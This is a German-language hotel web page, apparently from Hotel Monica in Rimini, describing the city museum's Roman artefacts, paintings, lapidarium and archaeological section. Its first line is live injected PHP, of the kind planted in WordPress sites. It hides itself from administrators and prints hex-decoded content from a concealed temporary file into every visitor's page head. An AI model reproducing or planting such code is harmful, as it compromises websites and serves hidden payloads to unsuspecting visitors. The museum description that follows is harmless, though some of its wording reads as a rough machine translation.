if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } das Stadtmuseum - Hotel Monica
 

das Stadtmuseum

In der L. Tonini Strasse, 1, neben der Kirche des Wahlrechts, die im Jesuitenkolleg aus dem achtzehnten Jahrhundert untergebracht ist (für Informationen Tel. 0541.21482), sammelt das Stadtmuseum die Vergangenheit von Rimini, ist eine Mine von Wundern und Kuriositäten.
Es gibt die kleinen Stücke, die als Eintrittskarten für das Amphitheater verwendet wurden, Statuen von Gladiatoren.
Nesteier von Pfennigen aus der Römerzeit, prächtige Mosaike, Amphoren und Ziegel der Tonöfen, die von den ersten Unternehmern von Rimini eröffnet wurden.
Es sind die Werke der Pinakothek ausgestellt, wo Sie Gemälde, Skulpturen und Keramiken, Wandteppiche und Goldschmiede bewundern können, das imposante Fresko mit dem Jüngsten Gericht aus der Kirche Sant’Agostino, die Meisterwerke der Rimini-Schule des vierzehnten Jahrhunderts, das raffinierte Kruzifix von Giovanni da Rimini und das kostbare Polyptychon von Giuliano da Rimini, Keramik und Tassen mit Malatesta-Wappen verziert, kostbare Tische des goldenen Zeitalters der Malatesta-Herrschaft, die an Künstler von großem Ruhm wie Giovanni Bellini, Domenico Ghirlandaio, Agostino di Duccio, Pisanello und Matteo de’ Pasti, Guido Cagnacci, Centino, Guercino und Simone Cantarini vergeben wurde.
Der Innenhof beherbergt das römische Lapidarium mit einer großen Sammlung von Inschriften aus dem ersten Jahrhundert a.C bis zum vierten Jahrhundert .C. ein permanenter Raum ist der prächtigen grafischen Produktion von Renè Gruau gewidmet, einem Künstler aus Rimini, der seit über 70 Jahren auf dem Gebiet der Modeillustration arbeitet.
Vor kurzem wurde der erste Abschnitt des Archäologischen Museums eröffnet, der dem kaiserlichen Rimini des zweiten und dritten Jahrhunderts gewidmet ist, mit besonderem Schwerpunkt auf dem Domus des Palazzo Diotallevi, berühmt für das Mosaik der Boote, und dem Domus der Piazza Ferrari, bekannt für die reiche Instrumentierung des Arztes und Chirurgen.

Anfrage Informationen

Füllen Sie das folgende Formular aus, um Informationen anzufordern.

Wir werden umgehend antworten!